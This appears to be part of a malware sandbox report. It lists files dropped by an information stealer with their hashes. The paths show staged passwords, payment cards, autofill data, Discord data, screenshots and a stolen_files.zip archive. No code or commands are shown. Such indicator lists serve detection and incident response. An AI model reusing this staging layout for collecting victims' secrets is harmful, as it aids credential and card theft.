memory/3368-187-0x000001E43C9D0000-0x000001E43C9D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.dll

MD5 9baa0df12803f82283279687bd6b8d0b
SHA1 116578b17ca654f68ea9eec33b77599e89f00f71
SHA256 043f7b7fdcd69eca59925dc251b3a70118ca15853b3fc124e02fd9abc680e2d8
SHA512 344a976598a52a0d25c6be2a251479fc68a513c9d9474733cdd4eff4577ac0dd149e2f63ecbd5b818001c695b5fbcb91d23ad9f2f9e15c76b05f19afe210fb2a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 63c760db3618dea9753509d96a7b0628
SHA1 5dd25f1a3b25068679a6b4255500383dc1e3c6be
SHA256 3d55aedc66fe55420c0bee9b388494902ea61ed6a7887f9ae6412ff924015d85
SHA512 0bbc5ac692e7fbe6d1d488a32179754349218175b25bc71c8d576a42cf18dc64409f17e150af02eae2e1ac4ddf463bd4429bfc5e6d9f5c531d854b1ea86f1b68

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dcfe1f94aa15e3ca618b4c5002c9c055
SHA1 b8abdaf68684bc49756086840035b93f79329892
SHA256 cf11bfe8cd92fd4293ae0bd884f2c3d397e68d54ea03352027ed6b6c93e8630d
SHA512 bce3736f22af50ef73c7ca17942eebddc00ea5b216fa9ad8c704fb6b5c0cc8d0b8aa992fc47270148c23d8257ba2ab9cae079ca239abebef7a92182941f8a73c

C:\ProgramData\Steam\Launcher\EN-Objiyuie\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Objiyuie\Serial-Check.txt

MD5 d7a9f9bdb36aa49f7ff3d5e264f3afd2
SHA1 e1127d5225386f9b3768c019444c79dbdf794361
SHA256 0a0a1afa36b28144d91ca35b6e59e614fd3c61ba86b850d7cb307ce88e711e93
SHA512 fbb0fbc72f6da52006db2ba90e8ac1f4cf7ebfc7421315cbe9b2509a875d8c236d950c4058288836a9ea454516c59225544bfa80e589b64bd90999b92a86950c

C:\ProgramData\Steam\Launcher\EN-Objiyuie\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Objiyuie\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Objiyuie\debug.log

MD5 81b0d5097c749b3667998b82da5e370b
SHA1 c39a499acb3a7cf36952d825ed5561fd97a19fdc
SHA256 457365bfff4b9c656296864fc55a2b92ca4f2bb4320eec0c0ff440c63a208e70
SHA512 7842057b02404da086bffb1d00edcafe63666fc3eaeb857221db0ca0d5637f3bb2fd8dfa013e9fcfa425b66da88bc06037b01ed3d3fb1ae617e994b9c9f6e886

C:\ProgramData\Steam\Launcher\EN-Objiyuie\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\ProgramData\Steam\Launcher\EN-Objiyuie\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 086af06833bc148f73d5b243dbcfc69c
SHA1 5e1c0045d6ee0755efb9a2cfa517c4d99b36f591
SHA256 7879acdaad68064251eb5120be9fc1d1dc0d9bf0300f48e7117272c7d5cd2944
SHA512 24ad3954b8f9d4f2dc7b9aeda27b69e14001dafdf9b29ffb78f68c085d2b0e7dc2a69c0e26c38f09530b68c158f9a2593525ba9b98162479b287d9dcd666fb39

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ca24df1817fa1aa670674846e5d41614
SHA1 dac66ea013bcc46d24f1ece855568187c6080eaf
SHA256 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db
SHA512 fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

C:\ProgramData\Steam\Launcher\EN-Objiyuie.zip

MD5 cf0c24c9d782577aba0abf62ea22a7e1
SHA1 6b1f1e836d1432910074e9c96dd611e43de1a0f3
SHA256 6eae9d2257887ef064bb16a656966f2544f9a65dc7503c1539aae298314b3a84
SHA512 ebefa303c02c166a03d0a02efba3e8de09c17f25d42e700885738a5924432f3c5a55151743b2785af22165a1070cad9ef307bf55f7258df88bd42e89f40e154c

C:\ProgramData\Steam\Launcher\EN-Objiyuie\Screenshots\Screenshot.png

MD5 1037a62a9814e96e51615faac220c30c
SHA1 97b083314659cdb156d7eb08c9b04df5fb098608
SHA256 519af148f2b5991f589ddb64297fb40695b5a12d1bcecb8f67298b245e663582
SHA512 63d4363d2939aa4befd8d63408f2552f624d0df2cd2d07a471f0848c3ba171fb22c5c9a15e35cd02b31a4b42f850166e684952e71fe6a1a5e40d966cc76904a0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0